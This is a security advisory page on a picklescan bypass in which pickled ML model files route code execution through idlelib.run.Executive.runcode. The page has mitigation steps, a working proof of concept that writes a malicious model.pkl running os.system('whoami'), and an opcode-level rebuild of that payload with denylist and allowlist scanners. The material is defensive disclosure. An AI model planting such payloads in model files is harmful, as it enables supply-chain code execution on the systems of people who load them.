GHSA-m869-42cg-3xwr: picklescan: scanner bypass enables RCE via ML models

GHSA-m869-42cg-3xwr MEDIUM
Published August 26, 2025
CISO Take

picklescan, the de-facto security gate for PyTorch and other pickle-based ML model files, does not flag a payload that routes execution through the standard-library function idlelib.run.Executive.runcode, so a malicious model receives a clean scan result and still achieves RCE at load time. Any MLOps pipeline that uses picklescan as the primary vetting control before torch.load() or pickle.load() is exposed. Update picklescan to v0.0.30 immediately and treat pickle-based model files that were vetted only by an earlier version as untrusted.

Risk Assessment

Effective risk is HIGH despite the MEDIUM advisory severity (no CVSS vector has been assigned). The bug defeats a control that is trusted specifically to prevent pickle-based RCE; a false negative here is worse than a bug in a loader, because a clean scan result removes the one point at which a suspicious file would have been rejected. Exploitability is moderate: an attacker has to craft a malicious pickle, but the PoC is public and trivial to adapt. Exposure is broad across organizations running model ingestion pipelines, model marketplaces, and AI research environments that standardized on picklescan.

Affected Systems

Package      Ecosystem   Vulnerable Range   Patched
picklescan   pip         < 0.0.30           0.0.30


Severity & Risk

CVSS 3.1
N/A
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Moderate

Recommended Action

6 steps
  1. PATCH

    Upgrade picklescan to >= 0.0.30 immediately — contains the fix for this bypass.

  2. AUDIT

    Review any model files loaded after scanning with picklescan < 0.0.30; treat provenance as unverified.

  3. SANDBOX

    Run model loading in isolated environments (containers with no network, restricted syscalls via seccomp) regardless of scan results — defense in depth against future bypasses.

  4. FORMAT MIGRATION

    Migrate model weights to the safetensors format (huggingface/safetensors), which stores a JSON header plus raw tensor bytes and contains no executable code, so loading it never deserializes Python objects. It replaces pickle only for tensors: optimizer state, custom Python objects and other pickled artifacts still need the controls above.

  5. DETECT

    Process monitoring cannot see a Python function call, so alert on what the payload does once it runs: a python worker in an ML workload spawning sh, bash or curl (the PoC's os.system path), opening unexpected outbound connections, or reading cloud credential files. Inside the loader process, Python audit hooks (sys.addaudithook, Python 3.8+) can log or block the import of idlelib and the os.system and subprocess.Popen events while a model is being loaded.

  6. SUPPLY CHAIN

    Enforce model provenance verification (hash + signature) from trusted registries; never rely on a single scanner as the sole gate.

Classification

Compliance Impact

This advisory is relevant to:

EU AI Act
Art. 15 - Accuracy, robustness and cybersecurity
Art. 9 - Risk management system
ISO 42001
A.6.1.4 - AI supply chain management
A.9.3 - AI system security controls
NIST AI RMF
GOVERN 1.7 - AI risks and organizational risk tolerance
MANAGE 2.4 - Residual risks treated with mitigations
OWASP LLM Top 10
LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is GHSA-m869-42cg-3xwr?

picklescan, the de-facto security gate for PyTorch and other pickle-based ML model files, does not flag a payload that routes execution through the standard-library function idlelib.run.Executive.runcode, so a malicious model receives a clean scan result and still achieves RCE at load time. Any MLOps pipeline that uses picklescan as the primary vetting control before torch.load() or pickle.load() is exposed. Update picklescan to v0.0.30 immediately and treat pickle-based model files that were vetted only by an earlier version as untrusted.

Is GHSA-m869-42cg-3xwr actively exploited?

No confirmed active exploitation of GHSA-m869-42cg-3xwr has been reported, but organizations should still patch proactively.

How to fix GHSA-m869-42cg-3xwr?

1. PATCH: Upgrade picklescan to >= 0.0.30 immediately; it contains the fix for this bypass.
2. AUDIT: Review any model files loaded after scanning with picklescan < 0.0.30; treat their provenance as unverified.
3. SANDBOX: Run model loading in isolated environments (containers with no network, restricted syscalls via seccomp) regardless of scan results, as defense in depth against future bypasses.
4. FORMAT MIGRATION: Migrate model weights to the safetensors format (huggingface/safetensors), which contains no executable code and is never deserialized as Python objects; pickled artifacts other than tensors still need the controls above.
5. DETECT: Process monitoring cannot see a Python function call, so alert on python workers in ML workloads spawning sh, bash or curl, opening unexpected outbound connections, or reading cloud credential files; inside the loader process, Python audit hooks can log or block the import of idlelib and the os.system and subprocess.Popen events during model loading.
6. SUPPLY CHAIN: Enforce model provenance verification (hash + signature) from trusted registries; never rely on a single scanner as the sole gate.

What systems are affected by GHSA-m869-42cg-3xwr?

This vulnerability affects the following AI/ML architecture patterns: training pipelines, model serving, MLOps CI/CD pipelines, model registries, data science workstations.

What is the CVSS score for GHSA-m869-42cg-3xwr?

No CVSS score has been assigned yet.

Technical Details

NVD Description

### Summary

Using the idlelib.run.Executive.runcode function, a function from Python's standard library, to execute code from a remote pickle file.

### Details

The attack proceeds in the following steps:

1. The attacker crafts the payload by returning idlelib.run.Executive.runcode from the __reduce__ method of a pickled object.
2. The victim checks the pickle file with the picklescan library, which does not detect any dangerous functions, and therefore decides to pickle.load() the malicious file, leading to remote code execution.

### PoC

```python
import pickle
from idlelib.run import Executive
from types import SimpleNamespace

class EvilIdlelibRunExecutiveRuncode:
    def __reduce__(self):
        payload = "__import__('os').system('whoami')"
        # Executive.runcode(self, code) calls exec(code, self.locals); a SimpleNamespace
        # with a 'locals' attribute stands in for the real Executive instance.
        fake_self = SimpleNamespace(locals={})
        # Unpickling resolves idlelib.run.Executive.runcode by name and calls it with these arguments.
        return Executive.runcode, (fake_self, payload)

with open("model.pkl", "wb") as f:
    pickle.dump(EvilIdlelibRunExecutiveRuncode(), f)
```

### Impact

Who is impacted? Any organization or individual relying on picklescan to detect malicious pickle files inside PyTorch models.

What is the impact? Attackers can embed malicious code in a pickle file that remains undetected by picklescan but executes when the file is loaded.

Supply chain attack: attackers can distribute infected pickle files as ML models, through APIs, or as saved Python objects.

### Corresponding

https://github.com/FredericDT
https://github.com/Qhaoduoyu
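Added example, not code from the advisory or from picklescan: the PoC above rebuilt from raw pickle opcodes, so it can be inspected on a host where idlelib (which imports tkinter) is absent, followed by the two static checks that matter for the AUDIT and SUPPLY CHAIN steps of the recommended action. A denylist of "known bad" modules, the approach this bypass defeated, passes the file; an allowlist of the globals a model file is expected to reference flags it. The denylist, the allowlist and the benign sample are assumptions for the demonstration, and nothing here calls pickle.load on the payload.

```python
import io
import pickle
import pickletools
from collections import OrderedDict

def _s(text):
    """SHORT_BINUNICODE: opcode, 1-byte length, UTF-8 body (must be < 256 bytes)."""
    body = text.encode("utf-8")
    if len(body) > 255:
        raise ValueError("string too long for SHORT_BINUNICODE")
    return pickle.SHORT_BINUNICODE + bytes([len(body)]) + body

def _global(module, name):
    """STACK_GLOBAL: push module, push qualified name, resolve via Unpickler.find_class()."""
    return _s(module) + _s(name) + pickle.STACK_GLOBAL

def build_payload(command):
    """The advisory's PoC as raw opcodes. Comments show the unpickler stack after each step."""
    return (
        pickle.PROTO + b"\x04"
        + _global("idlelib.run", "Executive.runcode")      # [runcode]
        + _global("types", "SimpleNamespace")              # [runcode, SimpleNamespace]
        + pickle.EMPTY_TUPLE + pickle.REDUCE               # [runcode, ns]   ns = SimpleNamespace()
        + pickle.EMPTY_DICT + _s("locals") + pickle.EMPTY_DICT + pickle.SETITEM
        + pickle.BUILD                                      # [runcode, ns]   ns.locals = {}
        + _s(command)                                       # [runcode, ns, command]
        + pickle.TUPLE2                                     # [runcode, (ns, command)]
        + pickle.REDUCE                                     # runcode(ns, command) -> exec(command, {})
        + pickle.STOP
    )

STRING_OPS = {"STRING", "BINSTRING", "SHORT_BINSTRING",
              "UNICODE", "BINUNICODE", "SHORT_BINUNICODE", "BINUNICODE8"}

def inventory_globals(data):
    """Every (module, name) the stream would hand to find_class, in order, without loading it.
    Handles both GLOBAL (protocol 0-3) and STACK_GLOBAL (protocol 4+) and follows memo
    references, so a module string reused via BINGET is still resolved."""
    found, strings, memo, last = [], [], {}, None
    for op, arg, pos in pickletools.genops(data):
        if op.name == "GLOBAL":                       # arg is "module name"
            found.append(tuple(arg.split(" ", 1)))
            last = None
        elif op.name == "STACK_GLOBAL":               # operands are the two strings pushed before it
            if len(strings) < 2:
                raise ValueError("malformed STACK_GLOBAL at offset %d" % pos)
            name, module = strings.pop(), strings.pop()
            found.append((module, name))
            last = None
        elif op.name in STRING_OPS:
            strings.append(arg)
            last = arg
        elif op.name == "MEMOIZE":
            memo[len(memo)] = last
        elif op.name in ("PUT", "BINPUT", "LONG_BINPUT"):
            memo[arg] = last
        elif op.name in ("GET", "BINGET", "LONG_BINGET"):
            last = memo.get(arg)
            if isinstance(last, str):
                strings.append(last)
        else:
            last = None
    return found

# Assumed for the demo: a denylist in the spirit of a signature scanner, and the allowlist
# a tensor-only file needs. Real PyTorch files also reference torch's own rebuild helpers.
DENYLIST_MODULES = {"os", "posix", "nt", "subprocess", "builtins", "sys", "shutil",
                    "socket", "runpy", "importlib", "pty", "webbrowser"}
ALLOWED_GLOBALS = {("collections", "OrderedDict")}

def denylist_scan(data):
    """What a signature scanner reports: globals whose top-level module is 'known bad'."""
    return [g for g in inventory_globals(data) if g[0].split(".")[0] in DENYLIST_MODULES]

def allowlist_scan(data):
    """What a deny-by-default gate reports: every global that is not explicitly expected."""
    return [g for g in inventory_globals(data) if g not in ALLOWED_GLOBALS]

def disassemble(data):
    """pickletools listing of the stream; dis() also validates stack depth and memo use."""
    out = io.StringIO()
    pickletools.dis(data, out=out)
    return out.getvalue()

def benign_pickle():
    """Constructed clean input: a state dict with one entry."""
    return pickle.dumps(OrderedDict(a=1), protocol=4)

if __name__ == "__main__":
    payload = build_payload("__import__('os').system('whoami')")
    print(disassemble(payload))
    print("denylist :", denylist_scan(payload))    # empty: the file passes, as it did picklescan
    print("allowlist:", allowlist_scan(payload))   # both globals flagged
    print("benign   :", allowlist_scan(benign_pickle()))
```

The inventory is a static approximation (it traces strings through the memo but is not a full pickle VM), so the enforcement point in a real pipeline is find_class in the loader, where a deny-by-default allowlist is the same idea torch.load(weights_only=True) applies through its own restricted unpickler. A denylist stays one unlisted standard-library callable behind the attacker, which is exactly what this advisory documents.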

Exploitation Scenario

An adversary targets an organization that pulls open-source models from HuggingFace for fine-tuning. They publish a malicious PyTorch checkpoint (.pth) embedding the EvilIdlelibRunExecutiveRuncode payload: a Python class whose __reduce__ method returns idlelib.run.Executive.runcode with an arbitrary command string as its argument. The organization's MLOps pipeline runs picklescan on every downloaded model; it reports clean. A data scientist calls torch.load() on the checkpoint with weights_only=False (the default before PyTorch 2.6), which unpickles the file, triggers __reduce__, and executes the attacker's command (for example a reverse shell or credential exfiltration) on the training server, a host that typically holds broad AWS/GCP IAM permissions for dataset access.

Timeline

Published
August 26, 2025
Last Modified
August 26, 2025
First Seen
March 24, 2026

Related Vulnerabilities